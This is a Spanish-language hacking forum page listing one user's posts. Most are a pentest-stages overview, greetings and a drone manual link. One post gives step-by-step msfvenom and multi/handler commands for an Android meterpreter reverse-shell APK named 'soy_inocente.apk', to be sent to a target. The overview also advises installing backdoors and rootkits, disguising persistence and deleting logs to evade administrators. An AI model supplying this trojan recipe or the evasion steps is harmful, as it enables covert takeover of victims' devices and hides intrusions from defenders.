Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - p51c0p4t4_666

#1
Pentesting / etapas del pentester-Introducción
Noviembre 06, 2018, 08:45:17 PM
Hola Mundo-Etapas del pentester 01
Interacciones previas al compromiso
Notas previas:
Me disculpo de antemano si les parece escueto pero solo es una introducción a este bello mundo
No profundizare en las diferentes etapas mencionadas ya que escribiré a profundidad los temas que aquí se mencionan, entre los que publicare después,
donde explicaré con lujo de detalle cada tema dividiendo lo en sub-temas para que haya una estructura organizacional y sea mas fácil de entender para todos
:D  me limitare a dar una explicación introductoria para los iniciados y así vaya en forma de serie siendo esta la introducción.

La recogida de información

Una gran parte de nuestro tiempo en la prueba de pentesting se basa en la recogida de información y es una de las etapas cruciales ya
que aquí es donde mayoritaria mente tendremos la información necesaria para hacer las pruebas de penetración mas adelante!
normalmente conlleva este tipo de estructura pero sin duda varía según el objetivo o el pentester
   *Ingeniería Social
   *Búsqueda en www [google shodan linkedin bing yahoo bing etc]
   *Búsqueda en basura de la empresa u objetivo si tiene el objetivo en fisico.
toda la información recabada es util nombres de organización u empresa locaciones ya que puede servir mas adelante algunos ejemplos
   *Números telefónicos de la empresa para pishing
   *Correos de usuarios o admins para pishing 
   *Números telefónicos de asociados de la empresa para pishing
   *Currículum Vitae de los empleados ya que abarcan mucha información util!
Recuerden que lo que es basura para unos es tesoro para otros!

Modelado de amenazas
Escaneo
   Aquí es donde se comienza a afinar los detalles sin lugar a dudas todo pentester desea pasar sin tapujos a la etapa de explotación pero es aquí
   donde se empiezan a escanear varios vectores de ataque como un buen escaneo con nmap para encontrar todos los servicios TCP/UDP que estén ab
   iertos como el ssh en puerto lógico 22 que es el puerto predeterminado y comenzar hacer fuerza bruta para acceder al sistema. De la primera etapa nos
   podemos valer de toda la información recolectada para comenzar a generar diccionarios con crunch :D identificar IDS o cortafuegos
   el escaneo de manera personal yo lo divido en estas partes a veces otras menos, pero pueden hacerlo según su criterio de personalización
      *Escaneo ARP
         Un escaneo rápido y efectivo trabaja en la capa 2 siendo esto algo que debemos de tener en cuenta, general mente no activa ninguna
         alarma
     *Escaneo de NMAP puertos lógicos abiertos
       1-65535
    *Escaneo de sistemas operativos
       Os scan
    *Escaneo de detección de servicios
    *Escaneo SMB Server Message Block diseñado por IMB 1980 para leer y compartir archivos en un host remoto a travez de LAN
    *Zona de transferencia DNS contiene información muy valiosa 3:D si puede solicitar una transferencia de zona podemos obtener todos los registros DNS
      para una zona en particular nombres de host relacionado a su IP, servidores correos, servicios en la red y mucho mucho mas!
   
    *Captura de paquetes

Enumeración
  En esta parte de nuestra fase es donde después de la recolección de información obtenida y los escaneos correspondientes comenzamos hacer un modelo
  de diseño basado en los resultados obtenidos enumerando las vulnerabilidades obtenidas según el riesgo que se tenga, yo en lo personal los divido en esta
  categoría por el grado de riesgo si es mayor tengo mas posibilidad  de acceder :D
    *mayor
    *medio
    *bajo

Explotación

Ganando acceso

Es para muchos una de nuestras fase preferidas aunque todas tienen su lado divertido! en este punto nosotros a través de la recolección, análisis numeración
y el modelo de diseño creado a partir de ello podemos por ejemplo crear una campaña de pishing creíble en base a los datos obtenidos siendo este un ataque
muy común y altamente efectivo con los datos correctos. Podemos ejecutar un exploits a través de una carga útil con metasploit o powershell incluso compilar
nuestros propios exploits :D
   *Exploits
     Cuando encontramos un fallo explotable debemos asegurarnos que el exploit en cuestión se confiable ya que de fallar podría levantar todas las banderas
      de alerta y arruinar nuestro arduo trabajo :,v lo recomendable es testearlo primero en entorno diferente al objetivo para asegurarnos que es confiable el
      exploit es la llave que nos da el acceso inicial
   *Exploits LINUX
      General mente los exploits para linux no suelen estar dirigidas para el sistema operativo si no a los servicios que se están ejecutando, algo a tener en
      cuenta es que los exploits pueden variar tanto de versión de servicio, distribución etc un buen sitio es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero no es el único
      les recomiendo una visita a otros sitios relacionado

   *Exploits WINDOWS
      General mente los exploits para windows suelen estar dirigidos a los servicios de escucha del sistema operativo y a los softwares de este Escala de
      privilegios
     General mente cuando se compromete el acceso al sistema se comienza con privilegios bajos a veces se puede tener la facilidad de comenzar con
     privilegios de root pero general mente se comienza con privilegios bajos y es un reto muy divertido escalar privilegios una vez ser root lo ideal sería
     pivoteando a otros nodos. y seguir con la penúltima etapa



Post-explotación

la penúltima etapa que es la post-explotación mantener el acceso con una puerta trasera y un rootkit para ocultar conexiones
  ya que la conexión puede perderse debido a que por ejemplo se reinicie el pc o los usuarios cierren sesión por eso es de buena practica mantener
  persistencia a través de los servicios de windows software como google para no llamar la atención es de suma importancia borrar los registros por el cual se
  accedió y ocultar los procesos para no llamar la atención de los administradores de sistemas xD

Reporte
  Este para algunos podría parecerles aburrido o incluso poco practico sin embargo si se siguió el estándar no tendremos complicaciones ni se nos hará
tedioso lo recomendable es conforme se avanza se vaya generando el reporte, puede que nos les paresca practico si no van a hacer un trabajo por el cual le
haya pagado un cliente pero les puede servir de referencia para próximo testeos.

Con esto doy por terminado esta primera entrega introductoria espero lo hayan disfrutado tanto como yo al escribirlo si les gusto espero su feedback
para continuar con la serie y profundizar en cada tema, estaría muy feliz de hacerlo para la comunidad
#2
Deshabilita DMZ a tu nodo y configura tu IP a Statica la cual tienes asignada en el s.o
#3
1 Ese puerto no es el adecuado utliza ejemplo 1024 a 49151 Debido a que pertenece al rango de puertos registrados y pueden ser usado por cualquier   aplicacion abre

2 Abre el puerto en tu modem con la IP que haras la conexion

3Activa los servicios
Código: php
service postgresql start 

4Conectate a tu DB
Código: php
db_connect msf_usuario:password@[IP PRIVADA]:4444/msf_database

5 Cuando creas el payload  ejemplo
Código: php
MSFVENOM -p android/meterpreter/reverse_tcp LHOST=IP PUBLICA LPORT=4444 P R> soy_inocente.apk
  Usa tu ip publica
6 Crea una sesion meterpreter
Código: php
MSFCONSOLE use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST   IP PRIVADA
set LPORT  4444
exploit
En marcha.........


5 Envia el archivo y espera, talvez sea problema de no activar tu puerto o equivocacion de colocacion ip saludos
#4
Hola mis hermanos psicoticos de este bello mundo virtual  8)
comparto con ustedes este interesante manual muy entretenido para crear tu propio DRON yo la verdad es que me gustan los drones y este manual comienza relatandonos desde la historia de inicio del dron! Hasta crear tu mismo y desde 0 tu DRON Solo usen traductor de google para los que no hablen ingles la narrativa del manual es tecnica y comprensible por lo cual no habra problemas con traductor de su agrado pero cualquier duda aqui estare...

paginas: [ 267   ]
formato: [ PDF  ]
idioma:   [ ENG ]

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Presentaciones y cumpleaños / Re:hola mundo
Julio 29, 2018, 09:20:57 AM
Gracias hermano me honra mucho tu bienvenida y tendré mucho en cuenta lo del firewall xD
#6
si te refieres al deterioro de la señal la norma son 100 metros pero si te refieres a distancias horizontales o verticales este manual pdf
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  [sin acortadores] tiene informacion relacionada sobre tu consulta.
#7
Presentaciones y cumpleaños / hola mundo
Julio 27, 2018, 08:23:17 PM
Me presento hermanos!
Soy un psicópata informático   ;)
  Espero poder hacer varios aportes en el foro!  y poder resolver dudas a los nuevos como yo,  que no les intimide mi demencia ya que simplemente salgo un poco de los lineamentos establecidos por la sociedad y sus normas.